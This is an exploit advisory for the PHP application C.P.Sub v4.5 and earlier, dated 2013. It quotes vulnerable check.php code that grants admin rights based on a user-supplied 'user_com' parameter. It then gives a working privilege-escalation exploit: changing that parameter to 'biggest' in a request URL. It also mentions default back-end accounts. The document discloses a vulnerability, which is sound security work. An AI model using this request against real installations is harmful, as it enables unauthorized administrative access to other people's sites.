#!/usr/bin/python######################################################################## Exploit Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication# Date: 2013/6/27# Exploit Author: Chako# Vendor Homepage: http://www.cooltey.org/ping/php.php# Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip# Version: <= v4.5# Tested on: Windows 7 ######################################################################
Improper Authentication:==========================================
Description:
C.P.Sub <= v4.5 use "user_com=" parameter to identify if the user has admin privilege.
Therefore an attacker could simply change the value for"user_com=" parameter to gain admin privilege./check.php (LINE:36-44)--------------------------------------------------------------if($_GET[user_com]!=""){
$user_com = $_GET[user_com];}elseif($_POST[user_com]!=""){
$user_com = $_POST[user_com];}if($user_com =="biggest"){--------------------------------------------------------------
Exploit:--------------------------------------------------------------
change
http://Example_Target/info.php?cookie=yes&user_com=second
to
http://Example_Target/info.php?cookie=yes&user_com=biggest
Misconfiguration
==========================================
There are some default accounts for C.P.Sub <= v4.5 that allows an attacker
to access back-end management page. It could lead to further attack.
